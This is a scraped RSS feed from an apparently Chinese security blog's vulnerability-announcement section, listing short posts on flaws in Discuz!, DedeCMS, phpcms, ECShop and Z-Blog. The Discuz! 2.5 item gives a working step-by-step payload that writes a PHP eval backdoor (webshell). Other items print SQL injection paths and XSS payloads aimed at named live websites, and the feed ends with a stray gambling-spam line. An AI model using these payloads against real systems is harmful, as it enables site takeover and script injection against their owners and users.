kingwq河北網絡安全博客 - 漏洞公告http://www.jhfzln.live/|河北博客|網絡安全|網站建設|病毒防御檢測|河北安全博客|石家莊安全博客|漏洞公告|網站優化SEO|河北石家莊SEO| - RainbowSoft Studio Z-Blog 1.8 Walle Build 100427zh-CN本站采用創作共用版權協議, 要求署名、非商業用途和保持一致. 轉載本站內容必須也遵循“署名-非商業用途-保持一致”的創作共用協議. This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP備09002514號.Copyright www.jhfzln.live.2010var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cscript src='" + _bdhmProtocol + "#/h.js%3F74444af26e6b2504fc0069beca54d916' type='text/javascript'%3E%3C/script%3E"));Sun, 13 Oct 2019 21:08:19 +0800 DZ!2.5 后臺拿 WebShell 方法 DZ!2.5 后臺拿 shell(圖)kingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20120502479/Wed, 02 May 2012 09:09:50 +0800http://www.jhfzln.live/article/BUG/20120502479/        1.注冊任意賬戶2.登陸用戶,發表blog日志(注意是日志)3.添加圖片,選擇網絡圖片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}  具體方法查看日志

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20120502479/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=842http://www.jhfzln.live/cmd.asp?act=tb&id=842&key=c509fa7a
河北博客:最新DEDECMS 漏洞0day 影響版本(dede5.5、dede5.6)kingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20110127161/Thu, 27 Jan 2011 09:02:31 +0800http://www.jhfzln.live/article/BUG/20110127161/影響版本:dedecms5.5-5.6
官方網站:http://www.dedecms.com
漏洞類型:設計錯誤
漏洞代碼:member\index_do.php

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20110127161/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=560http://www.jhfzln.live/cmd.asp?act=tb&id=560&key=4d6d6318
z-blog 1.8 最新跨站XSS漏洞及修復方法kingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20110112872/Wed, 12 Jan 2011 08:24:58 +0800http://www.jhfzln.live/article/BUG/20110112872/漏洞文件:cmd.asp

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20110112872/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=538http://www.jhfzln.live/cmd.asp?act=tb&id=538&key=bf823470
新網被指存漏洞導致域名被盜 用戶稱考慮索賠kingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/201001117414/Wed, 17 Nov 2010 16:11:31 +0800http://www.jhfzln.live/article/BUG/201001117414/11月17日消息,今日有域名界人士向TechWeb反映,眾多在新網注冊的CN域名被盜,包括51.cn、61.cn、168.cn、188.cn等極具價值的域名。域名界人士認為,被盜原因很可能是新網系統存在重大漏洞。

]]>
漏洞公告http://www.jhfzln.live/article/BUG/201001117414/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=520http://www.jhfzln.live/cmd.asp?act=tb&id=520&key=3cc3106c
phpcms2008 sp3注入漏洞kingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20100509714/Sun, 09 May 2010 22:30:23 +0800http://www.jhfzln.live/article/BUG/20100509714/phpcms最新版注入漏洞 注入yp/company.php?where=%23
進入后臺訪問
http://www.jzq8.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20100509714/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=460http://www.jhfzln.live/cmd.asp?act=tb&id=460&key=2a850490
ECShop 2.7.2 最新任意用戶登陸漏洞0daykingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20100509849/Sun, 09 May 2010 22:26:52 +0800http://www.jhfzln.live/article/BUG/20100509849/     ECShop 2.7.2正式版的源代碼, 且低級漏洞。這個漏洞可以讓任何人以任何用戶身份登錄到ECShop前臺! 漏洞的影響 ECShop 2.7.2,ECShop 2.7.1 不受影響 漏洞的出現 漏洞出現在/include/init.php文件的512行左右, 代碼如下

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20100509849/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=459http://www.jhfzln.live/cmd.asp?act=tb&id=459&key=4353cb75
phpcms2008 yp.php 注入利用 Xday EXPkingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20100509252/Sun, 09 May 2010 22:24:12 +0800http://www.jhfzln.live/article/BUG/20100509252/測試方法: 保存以下代碼為phpcms2008.php。安裝php,進入php目錄。執行php php2008.php localhost /yq 本地測試成功。

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20100509252/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=458http://www.jhfzln.live/cmd.asp?act=tb&id=458&key=98337fa8
瑞星防火墻監測出華軍軟件園被掛馬(附圖)kingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20100421584/Wed, 21 Apr 2010 09:31:27 +0800http://www.jhfzln.live/article/BUG/20100421584/      被掛馬頁面1:http://www.onlinedown.net/soft/3011.htm  被掛馬頁面2:http://www.onlinedown.net/softdown/3011_2.htm  不知道這次是華軍真的被掛馬呢還是誤報

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20100421584/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=440http://www.jhfzln.live/cmd.asp?act=tb&id=440&key=52c1a65d
游九(U9)網DOTA專題站搜索頁跨站漏洞kingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20100310982/Wed, 10 Mar 2010 22:35:51 +0800http://www.jhfzln.live/article/BUG/20100310982/代碼如下,括號任意內容
http://dota.uuu9.com/Search.aspx?keyword=<script>alert("http://www.jhfzln.live")</script>

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20100310982/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=432http://www.jhfzln.live/cmd.asp?act=tb&id=432&key=32597bbc
UCHOME1.5 XSS漏洞kingwq@kingwq.cn (kingwq)http://www.jhfzln.live/article/BUG/20100304469/Thu, 04 Mar 2010 10:47:36 +0800http://www.jhfzln.live/article/BUG/20100304469/測試代碼: 需要先登入會員
http://u.discuz.net//home//space.php?<script>alert(/hiphop/)</script></script>

]]>
漏洞公告http://www.jhfzln.live/article/BUG/20100304469/#commenthttp://www.jhfzln.live/http://www.jhfzln.live/feed.asp?cmt=428http://www.jhfzln.live/cmd.asp?act=tb&id=428&key=fc1b9342
神奇九龙送彩金